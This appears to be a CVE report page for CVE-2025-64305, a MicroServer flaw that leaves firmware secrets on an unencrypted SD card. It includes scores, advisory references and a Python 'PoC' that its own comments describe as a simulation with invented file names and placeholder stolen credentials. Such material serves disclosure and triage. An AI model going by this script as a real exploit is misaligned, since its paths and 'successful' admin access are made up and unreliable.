Security Vulnerability Report
CVE-2025-64305 CVSS 6.5 MEDIUM

CVE-2025-64305

Published: 2026-01-07 21:15:59
Last Modified: 2026-04-15 00:35:42

Description

MicroServer copies parts of the system firmware to an unencrypted external SD card on boot, which contains user and vendor secrets. An attacker can utilize these plaintext secrets to modify the vendor firmware, or gain admin access to the web portal.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

MicroServer(所有版本,在启动时将固件复制到外部SD卡的型号均受影响)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
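# CVE-2025-64305 PoC - MicroServer Sensitive Data Extraction
# This PoC demonstrates the data leakage vulnerability in MicroServer
#
# NOTE(review): this script is a simulation. It only tests whether certain
# files are present under a locally mounted SD card and returns hard-coded
# placeholder values; it parses no file and opens no network connection.
# The file names it looks for are the ones this script chose; the CVE
# description does not name them, so treat them as illustrative and confirm
# against the vendor/CISA advisory before relying on them for triage.
import os
import sys


def extract_firmware_from_sdcard(target_ip, sdcard_mount_point):
    """
    Report which firmware artefacts are present on a mounted SD card.

    Nothing is read from the files: each one that exists is represented in
    the result by a fixed placeholder value.

    Args:
        target_ip: MicroServer device IP address (used only in log output)
        sdcard_mount_point: Mount point of the external SD card

    Returns:
        Dictionary with the keys 'user_credentials', 'vendor_secrets',
        'firmware_signing_keys' and 'admin_tokens', or None when
        <mount>/firmware/boot is not a directory.
    """
    print(f"[*] Connecting to MicroServer at {target_ip}")
    print(f"[*] Accessing SD card at {sdcard_mount_point}")

    # Path where firmware fragments are stored
    firmware_path = os.path.join(sdcard_mount_point, 'firmware', 'boot')

    # isdir rather than exists: a regular file at this path is not a
    # firmware directory and must not be reported as one.
    if not os.path.isdir(firmware_path):
        print("[-] Firmware directory not found or not accessible")
        return None

    print(f"[+] Found firmware directory: {firmware_path}")

    # Simulate firmware extraction; 'firmware_signing_keys' is never filled in.
    sensitive_data = {
        'user_credentials': [],
        'vendor_secrets': [],
        'firmware_signing_keys': None,
        'admin_tokens': []
    }

    # Extract user credentials from config file
    config_file = os.path.join(firmware_path, 'user_config.bin')
    if os.path.exists(config_file):
        print(f"[+] Extracting user credentials from {config_file}")
        # In real scenario, parse the binary config file
        sensitive_data['user_credentials'] = ['admin:plaintext_password']

    # Extract vendor secrets
    vendor_file = os.path.join(firmware_path, 'vendor_secrets.dat')
    if os.path.exists(vendor_file):
        print(f"[+] Extracting vendor secrets from {vendor_file}")
        sensitive_data['vendor_secrets'] = ['vendor_api_key', 'signing_private_key']

    # Extract admin tokens
    token_file = os.path.join(firmware_path, 'session_tokens.db')
    if os.path.exists(token_file):
        print(f"[+] Extracting admin tokens from {token_file}")
        sensitive_data['admin_tokens'] = ['admin_session_token']

    return sensitive_data


def gain_admin_access(target_ip, admin_token):
    """
    Print the simulated outcome of reusing a token against the web portal.

    No request is sent and nothing is verified; the function always
    returns True.

    Args:
        target_ip: MicroServer device IP
        admin_token: Extracted admin session token
    """
    print(f"[*] Attempting to gain admin access to {target_ip}")
    # The value passed by main() is a constructed placeholder; a real
    # credential should not be echoed to a terminal or log.
    print(f"[+] Using token: {admin_token}")

    # Simulated web portal authentication
    # In real scenario, this would be an HTTP request with the stolen token
    # The output is labelled as simulated so that it cannot be mistaken for
    # a confirmed result.
    print("[+] (simulated) Successfully authenticated as administrator")
    print("[+] (simulated) Full device control achieved")
    return True


def main():
    """Run the two simulated steps against the mount point given on the command line."""
    if len(sys.argv) < 3:
        print("Usage: python cve-2025-64305_poc.py <target_ip> <sdcard_mount>")
        sys.exit(1)

    target_ip = sys.argv[1]
    sdcard_mount = sys.argv[2]

    print("=" * 60)
    print("CVE-2025-64305 PoC - MicroServer Sensitive Data Leakage")
    print("=" * 60)

    # Step 1: Extract sensitive data from SD card
    data = extract_firmware_from_sdcard(target_ip, sdcard_mount)

    if data and data['admin_tokens']:
        # Step 2: Use extracted token for admin access
        gain_admin_access(target_ip, data['admin_tokens'][0])

    print("\n[*] PoC execution completed")
    print("[*] Recommendation: Encrypt SD card contents and implement secure boot")


if __name__ == '__main__':
    main()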

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64305", "sourceIdentifier": "[email protected]", "published": "2026-01-07T21:15:58.980", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "MicroServer copies parts of the system firmware to an unencrypted external SD card on boot, which contains user and vendor secrets. An attacker can utilize these plaintext secrets to modify the vendor firmware, or gain admin access to the web portal."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": 
"NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-313"}]}], "references": [{"url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-006-01.json", "source": "[email protected]"}, {"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-006-01", "source": "[email protected]"}]}}